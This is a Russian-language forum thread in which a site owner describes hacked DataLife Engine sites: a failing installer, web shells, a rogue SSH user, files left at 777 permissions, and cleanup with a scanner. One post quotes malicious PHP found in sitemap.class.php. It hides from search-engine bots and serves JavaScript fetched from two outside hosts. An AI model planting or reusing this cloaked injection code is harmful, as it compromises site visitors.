Вопрос такой. На сервере установлены и успешно работают 2 сайта на DLE. Пытаюсь начать установку еще одного сайта. Но как только нажимаю кнопку "Начать установку" появляется вместо пользовательского соглашения страница "Установка скрипта была начата не с начала. Вернитесь на главную страницу начала установки скрипта: http://xxx.xx/install.php" И так постоянно. Права на папки выставлены, все как надо. Ума не приложу в чем проблема. Скрипт не нуленый.---------- Добавлено 27.05.2012 в 14:39 ----------Кстати ставил такой эксперимент, уже на установленных сайтах удалял файл config.php и также пробовал начать установку как будто с нуля - ту же самую ошибку выдавало. Как будто что то не так на самом сервере настроено что ли. Тут подметил одну особенность которой раньше не было. Захожу в админку и нажимаю Новости ожидающие модерации, публикую их. Раньше после надписи "Выбранные вами новости успешно опубликованы" если нажать кнопку "Назад" и новостей на модерации больше нет - писало что нет больше новостей. Или перекидывало снова на неопубликованные новости. А теперь кидает в общий раздел Редактирование новостей из админки.
Проснулся утром и снова тоже самое всплывающее окно на сайте. Оно показывается 1 раз в сутки. При обновлении страницы пропадает. И даже если с другого компа захожу то уже не появляется. На всех файлах и папках снова стоят права 777. Вредоносный код уже не нахожу также как и шеллов. Вобщем ищу надежного честного специалиста по такого рода взломам для починки моего ресурса. Надо искать шелл на сервере наверное а не на сайтах. Потому как в пользователях был один левый с правами доступа по SSH.
во всех папках не запретишь. сапа стоит к примеру. а взламывают инъекцией. надо обновляться до версии 9.6.
Помогли добрые люди с хостинга. Запустили проверку на шеллы и нашли в другом моем сайте на этом же серваке. В ISP нашел левого пользователя с правами доступа к шеллу. Если больше не взломают значит прокатило. Сайты рядом были на DLE 8.5 который дырявый. Хакер видимо его взломал и залил шелл а потом оттуда уже вовсю орудовал на серваке. Там же валялись папка с кукисами от многих крупных сайтов таких как mskd например.
Шелл я уже удалил. И почистил где нашел. Думается придется весь движок перезаливать. Айболит запустил в папке engine. Он там много чего нашел даже не относящегося к вредоносному.---------- Добавлено 15.05.2012 в 02:30 ----------/engine/classes/sitemap.class.php там еще вредоносный код. там ссылки на пару адресов левых
<?php
if (!preg_match('/(accoona|ia_archiver|antabot|ask jeeves|baidu|eltaindexer|feedfetcher|
gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|
worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|
mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|
yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)/i',
$_SERVER['HTTP_USER_AGENT'])) {
$urlp = "http://all-php.ru/?i=42084&c=3";
$urlpurs="http://masvip.ru/2095/take.html";
$code = @file_get_contents($urlp);
$code2 = @file_get_contents($urlpurs);
$data = substr($code,strpos($code,'document'),(strpos($code,');')+2) - strpos
($code,'document'));
$data2 = substr($code2,strpos($code2,'><!--')+5,(strpos($code2,'\')')+2) - (strpos
($code2,'><!--')+5));
header('Content-Type: text/javascript; windows-1251');
echo $data;
echo $data2;
//echo $code2;
}
?>
Было все в порядке. А к ночи стало интереснее. При любом действии в админке все очень тормозит и почему то отправляется запрос на сайт upgrade9.net не знаю что за сайт, вижу в Опере что туда запрос идет. Там сайт не отвечает и тогда уже работает мой сайт. Как узнать куда он там ломится и что именно посылает запрос?
/engine/inc/include/init.php вот где еще код был, заменил файл нормальным и все путем стало. У меня на сервере как раз ISP стоит. Не скажете как там этой рекурсией права выставить?
Удалил htaccess не запускается. Все равно белый экран.
И еще, как массово указать всем файлам и папкам права доступа 755 на папки и 644 на файлы? А то шелл всем выставил 777 и я замучался уже менять вручную права каждому файлику.---------- Добавлено 14.05.2012 в 19:40 ----------как называется шаблон админки? и в какой папке? в templates не нахожу
Тогда почему когда я его запускаю по адресу http://site.ru/111/ai-bolit.php то он срабатывает но проверяет только папку 111 ?
